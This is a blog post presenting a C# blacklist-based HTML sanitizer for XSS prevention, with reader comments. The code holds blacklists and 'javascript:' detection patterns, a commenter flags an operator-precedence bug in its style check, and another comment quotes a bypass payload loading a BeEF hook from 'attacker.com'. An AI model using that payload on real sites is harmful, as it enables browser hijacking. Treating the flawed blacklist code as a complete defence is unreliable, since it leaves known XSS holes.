.NET HTML Sanitation for rich HTML Input

Recently I was working on updating a legacy application to MVC 4 that included free form text input. When I set up the new site my initial approach was to not allow any rich HTML input, only simple text formatting that would respect a few simple HTML commands for bold, lists etc. and automatically handles line break processing for new lines and paragraphs. This is typical for what I do with most multi-line text input in my apps and it works very well with very little development effort involved.
Then the client sprung another note: Oh by the way we have a bunch of customers (real estate agents) who need to post complete HTML documents. Oh uh! There goes the simple theory. After some discussion and pleading on my part 😢 to try and avoid this type of raw HTML input because of potential XSS issues, the client decided to go ahead and allow raw HTML input anyway.
XSS
There has been lots of discussions on this subject on StackOverFlow (and here and here) but to after reading through some of the solutions I didn't really find anything that would work even closely for what I needed. Specifically we need to be able to allow just about any HTML markup, with the exception of script code. Remote CSS and Images need to be loaded, links need to work and so. While the 'legit' HTML posted by these agents is basic in nature it does span most of the full gamut of HTML (4). Most of the solutions XSS prevention/sanitizer solutions I found were way to aggressive and rendered the posted output unusable mostly because they tend to strip any externally loaded content.
In short I needed a custom solution. I thought the best solution to this would be to use an HTML parser - in this case the Html Agility Pack - and then to run through all the HTML markup provided and remove any of the blacklisted tags and a number of attributes that are prone to JavaScript injection.
There's much discussion on whether to use blacklists vs. whitelists in the discussions mentioned above, but I found that whitelists can make sense in simple scenarios where you might allow manual HTML input, but when you need to allow a larger array of HTML functionality a blacklist is probably easier to manage as the vast majority of elements and attributes could be allowed. Also white listing gets a bit more complex with HTML5 and the new proliferation of new HTML tags and most new tags generally don't affect XSS issues directly. Pure whitelisting based on elements and attributes also doesn't capture many edge cases (see some of the XSS cheat sheets listed below) so even with a white list, custom logic is still required to handle many of those edge cases.
The Microsoft Web Protection Library (AntiXSS)
My first thought was to check out the Microsoft AntiXSS library. Microsoft has an HTML Encoding and Sanitation library in the Microsoft Web Protection Library (formerly AntiXSS Library) on CodePlex, which provides stricter functions for whitelist encoding and sanitation. Initially I thought the Sanitation class and its static members would do the trick for me,but I found that this library is way too restrictive for my needs. Specifically the Sanitation class strips out images and links which rendered the full HTML from our real estate clients completely useless. I didn't spend much time with it, but apparently I'm not alone if feeling this library is not really useful without some way to configure operation.
To give you an example of what didn't work for me with the library here's a small and simple HTML fragment that includes script, img and anchor tags. I would expect the script to be stripped and everything else to be left intact. Here's the original HTML:
string value = "<b>Here</b> <script>alert('hello')</script> we go. Visit the " +
"<a href='http://west-wind.com'>West Wind</a> site. " +
"<img src='http://west-wind.com/images/new.gif' /> ";
and the code to sanitize it with the AntiXSS Sanitize class:
@Html.Raw(Microsoft.Security.Application.Sanitizer.GetSafeHtmlFragment(value))
This produced a not so useful sanitized string:
Here we go. Visit the West Wind site.
While it removed the <script> tag (good) it also removed the href from the link and the image tag altogether (bad). In some situations this might be useful, but for most tasks I doubt this is the desired behavior. While links can contain javascript: references and images can 'broadcast' information to a server, without configuration to tell the library what to restrict this becomes useless to me. I couldn't find any way to customize the white list, nor is there code available in this 'open source' library on CodePlex.
Using Html Agility Pack for HTML Parsing
The WPL library wasn't going to cut it. After doing a bit of research I decided the best approach for a custom solution would be to use an HTML parser and inspect the HTML fragment/document I'm trying to import. I've used the HTML Agility Pack before for a number of apps where I needed an HTML parser without requiring an instance of a full browser like the Internet Explorer Application object which is inadequate in Web apps. In case you haven't checked out the Html Agility Pack before, it's a powerful HTML parser library that you can use from your .NET code. It provides a simple, parsable HTML DOM model to full HTML documents or HTML fragments that let you walk through each of the elements in your document. If you've used the HTML or XML DOM in a browser before you'll feel right at home with the Agility Pack.
Blacklist based HTML Parsing to strip XSS Code
For my purposes of HTML sanitation, the process involved is to walk the HTML document one element at a time and then check each element and attribute against a blacklist. There's quite a bit of argument of what's better: A whitelist of allowed items or a blacklist of denied items. While whitelists tend to be more secure, they also require a lot more configuration. In the case of HTML5 a whitelist could be very extensive. For what I need, I only want to ensure that no JavaScript is executed, so a blacklist includes the obvious <script> tag plus any tag that allows loading of external content including <iframe>, <object>, <embed> and <link> etc. <form> is also excluded to avoid posting content to a different location. I also disallow <head> and <meta> tags in particular for my case, since I'm only allowing posting of HTML fragments. There is also some internal logic to exclude some attributes or attributes that include references to JavaScript or CSS expressions.
The default tag blacklist reflects my use case, but is customizable and can be added to.
Here's my HtmlSanitizer implementation:
using System.Collections.Generic;
using System.IO;
using System.Xml;
using HtmlAgilityPack;
namespace Westwind.Web.Utilities
{
public class HtmlSanitizer
{
public HashSet<string> BlackList = new HashSet<string>()
{
{ "script" },
{ "iframe" },
{ "form" },
{ "object" },
{ "embed" },
{ "link" },
{ "head" },
{ "meta" }
};
/// <summary>
/// Cleans up an HTML string and removes HTML tags in blacklist
/// </summary>
/// <param name="html"></param>
/// <returns></returns>
public static string SanitizeHtml(string html, params string[] blackList)
{
var sanitizer = new HtmlSanitizer();
if (blackList != null && blackList.Length > 0)
{
sanitizer.BlackList.Clear();
foreach (string item in blackList)
sanitizer.BlackList.Add(item);
}
return sanitizer.Sanitize(html);
}
/// <summary>
/// Cleans up an HTML string by removing elements
/// on the blacklist and all elements that start
/// with onXXX .
/// </summary>
/// <param name="html"></param>
/// <returns></returns>
public string Sanitize(string html)
{
var doc = new HtmlDocument();
doc.LoadHtml(html);
SanitizeHtmlNode(doc.DocumentNode);
//return doc.DocumentNode.WriteTo();
string output = null;
// Use an XmlTextWriter to create self-closing tags
using (StringWriter sw = new StringWriter())
{
XmlWriter writer = new XmlTextWriter(sw);
doc.DocumentNode.WriteTo(writer);
output = sw.ToString();
// strip off XML doc header
if (!string.IsNullOrEmpty(output))
{
int at = output.IndexOf("?>");
output = output.Substring(at + 2);
}
writer.Close();
}
doc = null;
return output;
}
private void SanitizeHtmlNode(HtmlNode node)
{
if (node.NodeType == HtmlNodeType.Element)
{
// check for blacklist items and remove
if (BlackList.Contains(node.Name))
{
node.Remove();
return;
}
// remove CSS Expressions and embedded script links
if (node.Name == "style")
{
if (string.IsNullOrEmpty(node.InnerText))
{
if (node.InnerHtml.Contains("expression") || node.InnerHtml.Contains("javascript:"))
node.ParentNode.RemoveChild(node);
}
}
// remove script attributes
if (node.HasAttributes)
{
for (int i = node.Attributes.Count - 1; i >= 0; i--)
{
HtmlAttribute currentAttribute = node.Attributes[i];
var attr = currentAttribute.Name.ToLower();
var val = currentAttribute.Value.ToLower();
span style="background: white; color: green">// remove event handlers
if (attr.StartsWith("on"))
node.Attributes.Remove(currentAttribute);
// remove script links
else if (
//(attr == "href" || attr== "src" || attr == "dynsrc" || attr == "lowsrc") &&
val != null &&
val.Contains("javascript:"))
node.Attributes.Remove(currentAttribute);
// Remove CSS Expressions
else if (attr == "style" &&
val != null &&
val.Contains("expression") || val.Contains("javascript:") || val.Contains("vbscript:"))
node.Attributes.Remove(currentAttribute);
}
}
}
// Look through child nodes recursively
if (node.HasChildNodes)
{
for (int i = node.ChildNodes.Count - 1; i >= 0; i--)
{
SanitizeHtmlNode(node.ChildNodes[i]);
}
}
}
}
}
Please note: Use this as a starting point only for your own parsing and review the code for your specific use case! If your needs are less lenient than mine were you can you can make this much stricter by not allowing src and href attributes or CSS links if your HTML doesn't allow it. You can also check links for external URLs and disallow those - lots of options. The code is simple enough to make it easy to extend to fit your use cases more specifically. It's also quite easy to make this code work using a WhiteList approach if you want to go that route. The code above is semi-generic for allowing full featured HTML fragments that only disallow script related content.
The Sanitize method walks through each node of the document and then recursively drills into all of its children until the entire document has been traversed. Note that the code here uses an XmlTextWriter to write output - this is done to preserve XHTML style self-closing tags which are otherwise left as non-self-closing tags.
The sanitizer code scans for blacklist elements and removes those elements not allowed. Note that the blacklist is configurable either in the instance class as a property or in the static method via the string parameter list. Additionally the code goes through each element's attributes and looks for a host of rules gleaned from some of the XSS cheat sheets listed at the end of the post. Clearly there are a lot more XSS vulnerabilities, but a lot of them apply to ancient browsers (IE6 and versions of Netscape) - many of these glaring holes (like CSS expressions - WTF IE?) have been removed in modern browsers.
What a Pain
To be honest this is NOT a piece of code that I wanted to write. I think building anything related to XSS is better left to people who have far more knowledge of the topic than I do. Unfortunately, I was unable to find a tool that worked even closely for me, or even provided a working base. For the project I was working on I had no choice and I'm sharing the code here merely as a base line to start with and potentially expand on for specific needs. It's sad that Microsoft Web Protection Library is currently such a train wreck - this is really something that should come from Microsoft as the systems vendor or possibly a third party that provides security tools.
Luckily for my application we are dealing with authenticated and validated users so the user base is fairly well known, and relatively small - this is not a wide open Internet application that's directly public facing. As I mentioned earlier in the post, if I had my way I would simply not allow this type of raw HTML input in the first place, and instead rely on a more controlled HTML input mechanism like MarkDown or even a good HTML Edit control that can provide some limits on what types of input are allowed. Alas in this case I was overridden and we had to go forward and allow any raw HTML posted.
Sometimes I really feel sad that it's come this far - how many good applications and tools have been thwarted by fear of XSS (or worse) attacks? So many things that could be done if we had a more secure browser experience and didn't have to deal with every little script twerp trying to hack into Web pages and obscure browser bugs. So much time wasted building secure apps, so much time wasted by others trying to hack apps… We're a funny species - no other species manages to waste as much time, effort and resources as we humans do 😃
Resources
The Voices of Reason
# re: .NET HTML Sanitation for rich HTML Input
# re: .NET HTML Sanitation for rich HTML Input
Now about that web site...
# re: .NET HTML Sanitation for rich HTML Input
# re: .NET HTML Sanitation for rich HTML Input
# re: .NET HTML Sanitation for rich HTML Input
I don't have any code to support the theory but i think its doable.
A separate app or process to sandbox the html request and return the result. A mini firewall if you will.
It would eliminate the need to check input or sanitize XSS.
Could be as simple as a Web Service with one method, or an HTTP handler maybe, the main idea being that it is isolated from the database and file system of the main application.
# re: .NET HTML Sanitation for rich HTML Input
# re: .NET HTML Sanitation for rich HTML Input
It's a far more effective white list approach than the microsoft version.
Owasp tend to be pretty good at what they do.
# re: .NET HTML Sanitation for rich HTML Input
https://github.com/mganss/HtmlSanitizer
p/s thank you for a completely pain-free commenting system!
# re: .NET HTML Sanitation for rich HTML Input
It works great with HTMLs Texts. But problem exists with the texts copied from Microsoft office document because it contains some strange encoding that you already know. Do you have any solution for this ?
___________________Copied from MS Word__________________
<html xmlns:v=3D"urn:schemas-microsoft-com:vml" xmlns:o=3D"urn:schemas-micr=
osoft-com:office:office" xmlns:w=3D"urn:schemas-microsoft-com:office:word" =
xmlns:m=3D"http://schemas.microsoft.com/office/2004/12/omml" xmlns=3D"http:=
//www.w3.org/TR/REC-html40"><head>
<meta http-equiv=3D"Content-Type" content=3D"text/html; charset=3DWindows-1=
252"><meta name=3D"Generator" content=3D"Microsoft Word 12 (filtered medium=
)"><style><!--
/* Font Definitions */
@font-face
{font-family:"Cambria Math";
panose-1:2 4 5 3 5 4 6 3 2 4;}
@font-face
{font-family:Calibri;
panose-1:2 15 5 2 2 2 4 3 2 4;}
@font-face
{font-family:Verdana;
panose-1:2 11 6 4 3 5 4 4 2 4;}
/* Style Definitions */
p.MsoNormal, li.MsoNormal, div.MsoNormal
{margin:0cm;
margin-bottom:.0001pt;
font-size:11.0pt;
font-family:"Calibri","sans-serif";}
a:link, span.MsoHyperlink
{mso-style-priority:99;
color:blue;
text-decoration:underline;}
a:visited, span.MsoHyperlinkFollowed
{mso-style-priority:99;
color:purple;
text-decoration:underline;}
span.E-MailFormatvorlage17
{mso-style-type:personal-compose;
font-family:"Calibri","sans-serif";
color:windowtext;}
.MsoChpDefault
{mso-style-type:export-only;}
@page WordSection1
{size:612.0pt 792.0pt;
margin:70.85pt 70.85pt 2.0cm 70.85pt;}
div.WordSection1
{page:WordSection1;}
--></style><!--[if gte mso 9]><xml>
<o:shapedefaults v:ext=3D"edit" spidmax=3D"1026" />
</xml><![endif]--><!--[if gte mso 9]><xml>
<o:shapelayout v:ext=3D"edit">
<o:idmap v:ext=3D"edit" data=3D"1" />
</o:shapelayout></xml><![endif]--></head><body lang=3D"DE" link=3D"blue" vl=
ink=3D"purple"><div class=3D"WordSection1"><p class=3D"MsoNormal">
_________________________
Output using your sanitizer contains a lot of
# re: .NET HTML Sanitation for rich HTML Input
https://github.com/Vereyon/HtmlRuleSanitizer
Thanks for providing the original inspiration on the approach of sanitizing an HTML document!
# re: .NET HTML Sanitation for rich HTML Input
You are missing a couple of parentheses around //Remove CSS Expressions parts. Result is potential null ptr exception and also the logic seems slightly off compared to comment. Suggested change (based on github code which has similar issues):
// remove event handlers if (attr.StartsWith("on")) node.Attributes.Remove(currentAttribute); // Remove CSS Expressions else if (attr == "style" && val != null && HasExpressionLinks(val)) node.Attributes.Remove(currentAttribute); // remove script links from all attributes else if (val != null && HasScriptLinks(val)) node.Attributes.Remove(currentAttribute);
# re: .NET HTML Sanitation for rich HTML Input
http://www.educationalstar.com
# re: .NET HTML Sanitation for rich HTML Input
<script src="//ajax.googleapis.com/ajax/libs/jqueryui/1.10.4/jquery-ui.min.js"></script>
<script src="/scripts/myJavascript.js"></script>
Browser support is good (http://caniuse.com/contentsecuritypolicy) and you can combine it with a HTML sanitiser to prevent anything slipping through the cracks.
As HTML, JavaScript, CSS and other web technologies develop, there will always be ways to bypass sanitizers. See this answer too: http://security.stackexchange.com/a/49342/8340
# re: .NET HTML Sanitation for rich HTML Input
<script src="attacker.com/beefhook.js"
Is allowed through (and the src attribute is doubled for some reason) with /> appended to the end to make it a valid tag.
# re: .NET HTML Sanitation for rich HTML Input
Markdown is mentioned at the end of the article, but that is not going to solve the sanitation issue. There are valid Markdown constructs that lead to dangerous HTML when rendered in a browser. In fact, here is a harmless example entered in Markdown and shown here in HTML:
Markdown is inherently unsafe and also requires server side sanitation on the output HTML. That would have prevented the above (harmless) link 😉
# re: .NET HTML Sanitation for rich HTML Input
@Grietver - that depends on the Markdown parser in use. Most Markdown parsers have options to disable script code or disallow HTML tags altogether.
# re: .NET HTML Sanitation for rich HTML Input
# re: .NET HTML Sanitation for rich HTML Input
# re: .NET HTML Sanitation for rich HTML Input
BTW, I'm not sure if it is the right way to go about it, but I fixed the "&nbsp;" issue with a string.Replace("&nbsp;"," ") after it ran through the sanitizer. That worked fine.
Anyway, thanks again.
# re: .NET HTML Sanitation for rich HTML Input
CQ doc = CQ.Create(html); string selector = String.Join(",",BlackList); // "iframe, form, ..." // CsQuery uses the property indexer as a default method, it's identical // to the "Select" method and functions like $(...) doc[selector].Remove(); doc["style:contains('expression'),style:contains('javascript:')].Remove();For testing script attributes, there's no native jQuery way to evaluate an attribute name itself, so that part wouldn't be all that different: you would still have to look through everything to do it without enumerating all the possible "onxxx" values. I'd probably use linq and do something like this:
It would be more efficient to enumerate all the possible event attribute names, though, since CsQuery would be able to use the index to locate them. This probably would make very little difference when talking about the amount of content likely to be submitted through a form, but if you were processing big documents from a CMS or something, it could.
There is also an API for creating custom filter-type selectors as in jQuery, but doing this as a one-off in LINQ is easy enough.